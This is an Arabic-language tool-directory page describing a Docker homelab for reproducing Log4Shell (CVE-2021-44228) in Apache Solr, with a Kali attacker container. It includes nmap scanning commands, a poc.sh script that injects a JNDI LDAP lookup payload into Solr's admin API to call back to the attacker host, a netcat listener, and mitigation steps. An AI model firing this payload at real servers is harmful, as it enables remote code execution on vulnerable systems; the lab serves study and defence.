Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
homelab-CVE-2021-44228 — Log4j Vulnerability homelab | Kitploit
أدوات/GitHubGitHub/ricardo354/homelab-cve-2021-44228
Container SecurityVulnerability AnalysisExploitationWeb Application ExploitationLearning & EducationLabs & Practice
GitHubricardo354/homelab-cve-2021-44228

homelab-CVE-2021-44228

Log4j Vulnerability homelab

عرض المستودع
منذ شهر واحدلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

Homelab: Log4Shell (CVE-2021-44228) في Apache Solr

بيئة خاضعة للرقابة في Docker لإعادة إنتاج ودراسة ثغرة Log4Shell في Apache Solr.

البيئة

  • الهدف (solr-lab): Apache Solr الإصدار 8.11.0 (vulhub/solr:8.11.0) يعمل بنسخة ضعيفة من Log4j.
  • المهاجم (kali-lab): حاوية Kali Linux أساسية مع nmap و curl و netcat مثبتة مسبقًا.

كيفية رفع المختبر

1. تشغيل الحاويات

في الطرفية الخاصة بك، ارفع البيئة في الخلفية:

root@kitploit:~
docker compose up -d --build

2. دخول Kali (حاوية المهاجم)

root@kitploit:~
docker compose exec -it kali-lab /bin/bash

3. استكشاف الشبكة الداخلية

داخل حاوية Kali، اكتشف شبكتك الفرعية وحدد عنوان IP الخاص بـ Apache Solr:

root@kitploit:~
# 1. اعرض عنوان IP وقناع الشبكة
hostname -I

# 2. امسح الشبكة الداخلية للعثور على IP الهدف (منفذ Solr: 8983)
# (استبدل الشبكة الفرعية أدناه وفقًا للـ IP الذي حصلت عليه من الأمر السابق)
nmap -p 8983 172.20.0.0/24


تشغيل PoC (إثبات المفهوم)

النص البرمجي poc.sh يقوم بحقن حمولة lookup JNDI في معامل واجهة برمجة تطبيقات إدارة Solr.

النص البرمجي (poc.sh)

root@kitploit:~
#!/usr/bin/env bash

if [ "$#" -lt 2 ]; then
    echo "الاستخدام: $0 <lhost> <rhost> [lport]"
    echo "مثال: $0 172.20.0.3 172.20.0.2 1389"
    exit 1
fi

KALI="$1"
TARGET="$2"
PORT_KALI="${3:-1389}"

echo "[*] الهدف: $TARGET"
echo "[*] المهاجم (LDAP): $KALI على المنفذ $PORT_KALI"
echo "[*] إطلاق الاستغلال..."

curl -g -v "http://${TARGET}:8983/solr/admin/cores?foo=\${jndi:ldap://${KALI}:${PORT_KALI}/x}"

التنفيذ

لا تزال داخل Kali، امنح الإذن للنص البرمجي وقم بتشغيله مع تمرير عناوين IP الصحيحة:

root@kitploit:~
chmod +x poc.sh
./poc.sh <IP_KALI> <IP_SOLR> 1389

ماذا يحدث هنا؟ سيقوم Solr بمعالجة الطلب ومحاولة فتح اتصال LDAP عائدًا إلى عنوان IP الخاص بـ Kali على المنفذ المحدد. يمكنك مراقبة محاولة الاتصال هذه عن طريق فتح مستمع سريع في Kali قبل تشغيل النص البرمجي (مثال: nc -lnvp 1389).


التخفيف

لإصلاح الخلل في Log4j 2:

  • التحديث: ترقية المكتبة إلى إصدارات آمنة (أعلى من 2.15.0 أو 2.17.1).
  • تنسيق رسالة JVM: في الإصدارات بين 2.10 و 2.14.1، قم بتعطيل lookups بإضافة العلم -Dlog4j2.formatMsgNoLookups=true عند بدء تشغيل Java.
  • إزالة الفئة: قم بإزالة الفئة الإشكالية يدويًا من ملف jar إذا لم تتمكن من التحديث:
root@kitploit:~
zip -q -d log4j-core-*.jar org/apache/logging/log4j/core/lookup/JndiLookup.class

تنزيل الأداة